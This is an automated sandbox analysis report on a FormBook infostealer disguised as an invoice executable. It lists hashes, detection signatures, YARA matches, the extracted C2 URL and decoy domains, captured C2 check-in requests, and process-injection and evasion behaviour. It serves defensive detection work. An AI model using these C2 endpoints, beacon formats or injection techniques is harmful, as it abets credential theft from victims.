
Windows Analysis Report INVOICE_90990_PDF.exe

Overview

General Information

Sample Name: INVOICE_90990_PDF.exe
Analysis ID: 461656
MD5: 3e94bee073a286e8b446e87a126dde1e
SHA1: bf461d7bc78fd36eb06ca49e4e02c3bc06897905
SHA256: 85951f6ce24ad0c5e5a73c26b48dca2c9e013b554639e46dbf02bffd56cf1891
Tags: exe, Invoice

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • INVOICE_90990_PDF.exe (PID: 5748 cmdline: 'C:\Users\user\Desktop\INVOICE_90990_PDF.exe' MD5: 3E94BEE073A286E8B446E87A126DDE1E)
    • INVOICE_90990_PDF.exe (PID: 6040 cmdline: 'C:\Users\user\Desktop\INVOICE_90990_PDF.exe' MD5: 3E94BEE073A286E8B446E87A126DDE1E)
      • explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 3900 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
      • chkdsk.exe (PID: 5412 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
        • cmd.exe (PID: 5924 cmdline: /c del 'C:\Users\user\Desktop\INVOICE_90990_PDF.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 5380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.microprojects.net/usvr/"], "decoy": ["theblockmeatstore.com", "drone-moment.com", "srsfashionbd.com", "kylayagerartwork.com", "instagrams.tools", "rosenwealth.com", "indicraftsvilla.com", "rswizard.com", "irist.one", "pubgclaimx14.com", "thegeorgiahomefinder.com", "unusualdog.com", "kifayatikart.com", "methodunit.net", "bavarian-luxury.com", "17391000.com", "ipcsaveday.com", "yael-b.com", "pasionqueconecta.com", "youngsvideography.com", "absorbscratch.icu", "nzrugbylife.info", "inabellesolutions.com", "applesoso.com", "soshop365.com", "viewmydiary.com", "onemillionrosary.com", "erotickykontakt.com", "xn--yfr994dchc.net", "quiltedpicturebooks.com", "monteiromarquesadv.com", "anugrahdayakencana.com", "jz-fh.com", "beijingjiadu.com", "qdwentang.com", "shandasden.com", "xn--bckb2ercf4fxgsa3e.xyz", "ecozoca.com", "spiritsvest.com", "pigsflycheap.com", "onenationunderbread.com", "bunganutlakecampingarea.com", "deltafinancialgroup.net", "glamsocialevents.com", "sportzdestinations.com", "memento-lagoon.com", "nuvo-condos.com", "urteiki.com", "negociosconjuanceri.com", "finescocms.com", "simposiocpa.com", "topelk.com", "duetoboias.com", "priormakers.net", "impossibilitee.com", "zombiguitar.com", "conseilaffaires.com", "ecrires.xyz", "magetu.info", "miracle-tone.com", "quranvisor.com", "thebabytemplate.com", "wcarrillo.com", "wallstmotorsports.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166c9:$sqlite3step: 68 34 1C 7B E1
  • 0x167dc:$sqlite3step: 68 34 1C 7B E1
  • 0x166f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1681d:$sqlite3text: 68 38 2A 90 C5
  • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(19 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.INVOICE_90990_PDF.exe.3970000.2.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.INVOICE_90990_PDF.exe.3970000.2.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19797:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a83a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.INVOICE_90990_PDF.exe.3970000.2.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166c9:$sqlite3step: 68 34 1C 7B E1
  • 0x167dc:$sqlite3step: 68 34 1C 7B E1
  • 0x166f8:$sqlite3text: 68 38 2A 90 C5
  • 0x1681d:$sqlite3text: 68 38 2A 90 C5
  • 0x1670b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16833:$sqlite3blob: 68 53 D8 7F 8C
2.1.INVOICE_90990_PDF.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
2.1.INVOICE_90990_PDF.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18997:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(13 further entries not shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://www.theblockmeatstore.com/usvr/?mN9d3vF=Hs/L2mJb/OvBe1dqvAkGsli1RxAdmzZKlJhWcEJnXFq+EPLVBdDFfDQ7MNGC2C8pb8qs&Pjf81=-Zdd-V5hqhM4p2S | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.microprojects.net/usvr/"], "decoy": ["theblockmeatstore.com", "drone-moment.com", "srsfashionbd.com", "kylayagerartwork.com", "instagrams.tools", "rosenwealth.com", "indicraftsvilla.com", "rswizard.com", "irist.one", "pubgclaimx14.com", "thegeorgiahomefinder.com", "unusualdog.com", "kifayatikart.com", "methodunit.net", "bavarian-luxury.com", "17391000.com", "ipcsaveday.com", "yael-b.com", "pasionqueconecta.com", "youngsvideography.com", "absorbscratch.icu", "nzrugbylife.info", "inabellesolutions.com", "applesoso.com", "soshop365.com", "viewmydiary.com", "onemillionrosary.com", "erotickykontakt.com", "xn--yfr994dchc.net", "quiltedpicturebooks.com", "monteiromarquesadv.com", "anugrahdayakencana.com", "jz-fh.com", "beijingjiadu.com", "qdwentang.com", "shandasden.com", "xn--bckb2ercf4fxgsa3e.xyz", "ecozoca.com", "spiritsvest.com", "pigsflycheap.com", "onenationunderbread.com", "bunganutlakecampingarea.com", "deltafinancialgroup.net", "glamsocialevents.com", "sportzdestinations.com", "memento-lagoon.com", "nuvo-condos.com", "urteiki.com", "negociosconjuanceri.com", "finescocms.com", "simposiocpa.com", "topelk.com", "duetoboias.com", "priormakers.net", "impossibilitee.com", "zombiguitar.com", "conseilaffaires.com", "ecrires.xyz", "magetu.info", "miracle-tone.com", "quranvisor.com", "thebabytemplate.com", "wcarrillo.com", "wallstmotorsports.com"]}
Multi AV Scanner detection for submitted file
Source: INVOICE_90990_PDF.exe | Virustotal: Detection: 34%
Source: INVOICE_90990_PDF.exe | ReversingLabs: Detection: 32%
Yara detected FormBook
Source: Yara match | File source: 0.2.INVOICE_90990_PDF.exe.3970000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.INVOICE_90990_PDF.exe.3970000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.234295512.0000000003970000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.278227524.0000000006D3C000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.312959216.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.313017182.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for sample
Source: INVOICE_90990_PDF.exe | Joe Sandbox ML: detected
Source: 2.1.INVOICE_90990_PDF.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.INVOICE_90990_PDF.exe.3970000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 2.2.INVOICE_90990_PDF.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: INVOICE_90990_PDF.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: Binary string: chkdsk.pdbGCTL source: INVOICE_90990_PDF.exe, 00000002.00000002.313490785.0000000000789000.00000004.00000020.sdmp
Source: Binary string: C:\xampp\htdocs\Loct\3ec9815872b24c7398dfa8b3102e9d98\Loader\Project1\Release\Project1.pdb source: INVOICE_90990_PDF.exe
Source: Binary string: chkdsk.pdb source: INVOICE_90990_PDF.exe, 00000002.00000002.313490785.0000000000789000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP source: INVOICE_90990_PDF.exe, 00000000.00000003.225868321.0000000003B40000.00000004.00000001.sdmp, INVOICE_90990_PDF.exe, 00000002.00000002.313787359.0000000000BC0000.00000040.00000001.sdmp, chkdsk.exe, 00000011.00000002.493007627.0000000004F0F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: INVOICE_90990_PDF.exe, chkdsk.exe, 00000011.00000002.493007627.0000000004F0F000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 0_2_004074A7 FindFirstFileExW,0_2_004074A7
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 4x nop then pop ebx 2_2_00406A9A
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 4x nop then pop edi 2_2_004162B5
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 4x nop then pop edi 2_2_0040C3FE
Source: C:\Users\user\Desktop\INVOICE_90990_PDF.exe | Code function: 4x nop then pop edi 2_2_00415682
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4x nop then pop edi 17_2_04CD5682
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4x nop then pop ebx 17_2_04CC6A9B
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4x nop then pop edi 17_2_04CD62B5
Source: C:\Windows\SysWOW64\chkdsk.exe | Code function: 4x nop then pop edi 17_2_04CCC3FE

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49730 -> 1.1.1.1:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49730 -> 1.1.1.1:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49730 -> 1.1.1.1:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49734 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49734 -> 184.168.131.241:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49734 -> 184.168.131.241:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.microprojects.net/usvr/
Source: global traffic | HTTP traffic detected: GET /usvr/?mN9d3vF=mSPJpO37iDi/JJOtFEB7cPoDq+rcFEXmmeg8f//WLLXT9MV2z86QjVFC/G6KvJkMQ56/&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1 | Host: www.zombiguitar.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /usvr/?mN9d3vF=Hs/L2mJb/OvBe1dqvAkGsli1RxAdmzZKlJhWcEJnXFq+EPLVBdDFfDQ7MNGC2C8pb8qs&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1 | Host: www.theblockmeatstore.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /usvr/?mN9d3vF=HHrW7cA9N4YJlebHFvlsdlDciSnnaQItEG8Ccfxp291VjnjcuwoPACt7EOqEq4SWjIf8&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1 | Host: www.quranvisor.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /usvr/?mN9d3vF=88iqZAUt96yR2rhEKdAsW+fIMlmUNDlEhlDMqrW0RE04oS4B75X1YpNyeqb0CjqVEbVs&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1 | Host: www.unusualdog.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /usvr/?mN9d3vF=8RyEtVVG+MiCI1HG4WzhTXpggWFiFE6I6c52L9mZQW9H1FVN9zkXeGU91jHst47aV7F3&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1 | Host: www.microprojects.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /usvr/?mN9d3vF=SVmsrIRWYZxXscrAO9QNZyPvXLa+FThupnxYxRGhLcXdUbStD2hXLx2gyTP+PPpUbQNQ&Pjf81=-Zdd-V5hqhM4p2S HTTP/1.1 | Host: www.bavarian-luxury.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 52.20.84.62
Source: Joe Sandbox View | ASN Name: PLI-ASCH
Source: Joe Sandbox View | ASN Name: AMAZON-AESUS
Source: unknown | DNS traffic detected: queries for: www.17391000.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: openresty | Date: Mon, 09 Aug 2021 11:10:23 GMT | Content-Type: text/html | Transfer-Encoding: chunked | Connection: close | Data Raw: 39 36 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a | Data Ascii: 96<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>0
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000005.00000000.254238270.000000000BC36000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 0.2.INVOICE_90990_PDF.exe.3970000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.INVOICE_90990_PDF.exe.3970000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.1.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.234295512.0000000003970000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.278227524.0000000006D3C000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.312959216.0000000000590000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.313017182.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.312696667.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0.2.INVOICE_90990_PDF.exe.3970000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.INVOICE_90990_PDF.exe.3970000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.INVOICE_90990_PDF.exe.3970000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.INVOICE_90990_PDF.exe.3970000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.1.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.1.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.INVOICE_90990_PDF.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.INVOICE_90990_PDF.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.490998807.0000000000430000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000001.231116908.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
Source: 00000011.00000002.492524141.0000000004CC0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000000.00000002.234295512.0000000003970000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
Source: 00000000.00000002.234295512.0000000003970000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory (Author: JPCERT/CC Incident Response Group)
Source: 00000005.00000000.278227524.0000000006D3C000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator (Author: Felix Bilstein - yara-signator at cocacoding dot com)
